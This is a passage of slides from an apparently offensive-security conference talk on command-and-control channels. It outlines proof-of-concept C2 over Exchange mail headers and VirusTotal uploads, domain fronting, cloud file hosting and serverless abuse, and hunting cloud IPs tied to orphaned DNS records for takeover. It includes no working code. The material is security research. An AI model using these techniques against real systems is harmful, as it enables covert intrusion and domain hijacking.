_____ _ _____ ___ ___ _| _ |___ ___| |_| | _| _|_|___ ___| __| . |_ -| _| | | _| _| | _| -_||__| |___|___|_| |_____|_| |_| |_|___|___|
EWS Mail C2 - Proof of Concept
![Page 62: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/62.jpg)
[ poc - postoffice ]
Victim Attacker
Exchange:EWS SendGrid
1Pull endpoint
settings and
credentials
3Send E-Mail C2
in X-Header
2Configure the
auto-hide rule
4Inbound webhook
forwards content
![Page 63: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/63.jpg)
[ poc - postoffice ]
![Page 64: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/64.jpg)
[ poc - postoffice ]
[ insert demo here ]
![Page 65: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/65.jpg)
[ trusted abuse ]
▪ Communication [ e-mail | chat | social]
▪ Operations [ b2b | saas | internal | etc ]
▪ Security [ vendors | trust repos ]
▪ Office 365 : MWR Labs1
▪ GitHub : canisrufus2
▪ Google Drive : DarkHydrus3
1 https://labs.mwrinfosecurity.com/blog/tasking-office-365-for-cobalt-strike-c22 https://github.com/maldevel/canisrufus3 https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications/
![Page 66: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/66.jpg)
[ trusted abuse ]
▪ Communication [ e-mail | chat | social]
▪ Operations [ b2b | saas | internal | etc ]
▪ Security [ vendors | trust repos ]
▪ Active Directory : harmj0y1
▪ MSSQL : PowerUpSQL / NetSPI2
▪ File Shares : outflank3
1 https://www.harmj0y.net/blog/powershell/command-and-control-using-active-directory/2 https://blog.netspi.com/databases-and-clouds-sql-server-as-a-c2/3 https://outflank.nl/blog/2017/09/17/blogpost-cobalt-strike-over-external-c2-beacon-home-in-the-most-obscure-ways/
![Page 67: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/67.jpg)
[ trusted abuse ]
▪ Communication [ e-mail | chat | social]
▪ Operations [ b2b | saas | internal | etc ]
▪ Security [ vendors | trust repos ]
▪ Wikipedia : wikipedia-c21
▪ Pastebin : Aggah Campaign2
1 https://github.com/daniel-infosec/wikipedia-c22 https://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/
![Page 68: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/68.jpg)
[ trusted abuse ]
▪ Communication [ e-mail | chat | social]
▪ Operations [ b2b | saas | internal | etc ]
▪ Security [ vendors | trust repos ] ?
![Page 69: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/69.jpg)
[ poc - addendum ]
▪ Stuffs data into office document properties
▪ Tracks sample uploads using comments
▪ Handles large payloads gracefully (1MB+)
▪ Ideal for static stages / downloads
_____ _ _ _ | _ |_| |_| |___ ___ _| |_ _ _____ | | . | . | -_| | . | | | ||__|__|___|___|___|_|_|___|___|_|_|_|
VirusTotal C2 - Proof of Concept
![Page 70: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/70.jpg)
[ poc - addendum ]
Victim Attacker
VirusTotal
1Pack callback
data in a office
document
2Upload sample
for analysis
3Tag/identify the
file using
comments4
Extract callback
from the web
response
![Page 71: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/71.jpg)
[ poc - addendum ]
[ insert demo here ]
![Page 72: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/72.jpg)
cloud abuse&
takeover
![Page 73: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/73.jpg)
[ the “cloud” ]
AWS 47%
Azure 22%
Alibaba 8%
GCP 7%84%
▪ Lots of functionality – opportunity for abuse but
▪ We’ll stay focused on C2 primitives
▪ CDN endpoints
▪ Serverless architectures
▪ File hosting
▪ Message queues
▪ VPNs
![Page 74: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/74.jpg)
[ the “issue” ]
Trust boundaries
Dynamic assets
![Page 75: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/75.jpg)
[ the “issue” ]
Trust boundaries | Dynamic assets
Client
Server
![Page 76: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/76.jpg)
[ the “issue” ]
Trust boundaries | Dynamic assets
Implant
LP
Trust Repository
perimeter
![Page 77: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/77.jpg)
[ the “issue” ]
Trust boundaries | Dynamic assets
Implant
LP
msn
?
perimeter
![Page 78: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/78.jpg)
[ the “issue” ]
Trust boundaries | Dynamic assets
uploads.azurewebsites.net
myresume.appspot.com
recruiter.amazonaws.com
meetings.blob.core.windows.net
security.cloudfront.net
reports.akamai.net
updates.akamaiedge.net
cdn.kunlungr.com
![Page 79: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/79.jpg)
[ the “issue” ]
Trust boundaries | Dynamic assets
▪ How will TLS scale with the cloud?
▪ How does DNS cope with reallocation?
▪ How can we represent ownership?
▪ How do we prevent misconfiguration?
![Page 80: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/80.jpg)
[ abuse - fronting ]
http://kittens.com/index.html
[DNS] kittens.azureedge.net : 1.2.3.4
[DNS] kittens.com : kittens.azureedge.net
1.2.3.4
GET /index.html
Host: kittens.azureedge.net
[TLS] I’m looking for kittens.com
![Page 81: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/81.jpg)
[ abuse - fronting ]
http://puppies.com/index.html
[DNS] puppies.azureedge.net : 1.2.3.4
[DNS] puppies.com : puppies.azureedge.net
1.2.3.4
GET /index.html
Host: puppies.azureedge.net
[TLS] I’m looking for puppies.com
![Page 82: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/82.jpg)
[ abuse - fronting ]
[DNS] kittens.com : 1.2.3.4
1.2.3.4
GET /index.html
Host: puppies.azureedge.net
kittens.com
GET /index.html
Host: puppies.azureedge.net
Web Logs
...
…....
![Page 83: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/83.jpg)
[ abuse - file hosting ]
▪ Hosting static payloads in containers1
▪ Shoveling dynamic data via containers2
▪ AWS - S3 Buckets
https://s3.amazonaws.com/[bucket]/[object]
https://[bucket].s3.amazonaws.com/[object]
▪ Azure - Blob Storage
https://[account].blob.core.windows.net/[container]/[object]?...
▪ GCP - Cloud Storage
https://storage.googleapis.com/[bucket]/[object]
https://[bucket].storage.googleapis.com/[object]
1 https://pentestarmoury.com/2017/07/19/s3-buckets-for-good-and-evil/2 https://rhinosecuritylabs.com/aws/hiding-cloudcobalt-strike-beacon-c2-using-amazon-apis/
![Page 84: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/84.jpg)
[ abuse - serverless code ]
▪ Pass-through traffic redirection1
▪ Hosted C2 server2
▪ AWS - Lambdahttp://[id].execute-api.[region].amazonaws.com/[function]
▪ Azure - Functionshttp://[app].azurewebsites.net/api/[function]?code=[key]
▪ GCP - App Enginehttp://[app].appspot.com/[function]
1 https://www.securityartwork.es/2017/01/31/simple-domain-fronting-poc-with-gae-c2-server/2 https://github.com/aws/chalice
![Page 85: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/85.jpg)
[ takeover primitives ]
DNS v Dynamic Stuff
▪ Orphaned records are common
▪ Prior research in the area▪ Analysis of DNS in CyberSecurity1
▪ AWS Route53 nameserver takeover2
▪ 3rd party object re-collection3
▪ Practical guide to subdomain takeover4
▪ The Orphaned Internet: Taking over 120k domains5
1 https://is.muni.cz/th/byrdn/Thesis.pdf2 https://0xpatrik.com/subdomain-takeover-ns/3 https://github.com/EdOverflow/can-i-take-over-xyz4 https://www.exploit-db.com/docs/464155 https://bit.ly/2ggHlzn
![Page 86: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/86.jpg)
[ takeover primitives ]
▪ Two primary schools of thought:
1. Go after CNAME records
2. Go after NS records
▪ What about others?▪ Can we target IP-based records?
“How quickly could we collect new addresses?”
“How would we accurately check for an orphan record?”
![Page 87: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/87.jpg)
[ ip hunting concept ]
Attacker
DaCloud
1Collect a
random IP
2Query DNS repository for
associated records3
Keep the
address for use
4Repeat
?
![Page 88: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/88.jpg)
[ record sets ]
▪ PTR Records ?
▪ Rapid7 OpenDNS1
▪ Verisign Top Level Zone File2
▪ WhoisXMLAPI Database3
▪ SecurityTrails4
1 https://opendata.rapid7.com/2 https://www.verisign.com/en_US/channel-resources/domain-registry-products/zone-file/index.xhtml3 https://dns-database-download.whoisxmlapi.com/4 https://securitytrails.com/corp/pricing
![Page 89: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/89.jpg)
[ poc - cloud racoon ]
▪ Hunts for IPs linked to orphaned DNS records
▪ Uses cloud APIs for fast cycling
▪ Lookup is performed via SecurityTrails
▪ Tooling available for AWS, Azure, and GCP
_____ _ _ _____ | | |___ _ _ _| | __ |___ ___ ___ ___ ___ | --| | . | | | . | -| .'| _| . | . | ||_____|_|___|___|___|__|__|__,|___|___|___|_|_|
Cloud IP Hunting - Proof of Concept
![Page 90: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/90.jpg)
[ poc - cloud racoon ]
[ insert demo here ]
![Page 91: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/91.jpg)
finalthoughts
![Page 92: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/92.jpg)
[ key points ]
▪ C2 is a very complex discipline▪ Implementations vary greatly
▪ Any particular design is rarely random
▪ Lots of public information is already available▪ None of this is “theoretical” anymore
▪ We need to start solving these new problems▪ 3rd party abuse is growing
▪ Cloud represents very unique challenges
![Page 93: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/93.jpg)
[ what wasn’t covered ]
▪ Offensive Infrastructure▪ Asset collection and security
▪ Traffic redirection
▪ Stage segmentation
▪ Architecture Details▪ Integrating code with a C2 methodology
▪ Encoding or encryption details
▪ Language selection or framework limitation
▪ Implementation Costs
![Page 94: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/94.jpg)
[ additional resources ]
▪ MITRE Tacticshttps://attack.mitre.org/tactics/TA0011/
▪ Azeria Labshttps://azeria-labs.com/command-and-control/
▪ RTI Wiki https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki
▪ Domain Fronting Lists https://github.com/vysec/DomainFrontingLists
![Page 95: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/95.jpg)
[ additional resources ]
▪ Subdomain Takeover Toolinghttps://github.com/haccer/subjac
https://github.com/antichown/subdomain-takeover
https://github.com/SaadAhmedx/Subdomain-Takeover
https://github.com/LukaSikic/subzy
https://github.com/samhaxr/TakeOver-v1
▪ scanio.sh for takeover searchinghttps://gist.github.com/haccer/3698ff6927fc00c8fe533fc977f850f8
![Page 96: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/96.jpg)
[ finish ]
Thank you for coming!
@monoxgas
https://github.com/monoxgas/ (soon)
Questions?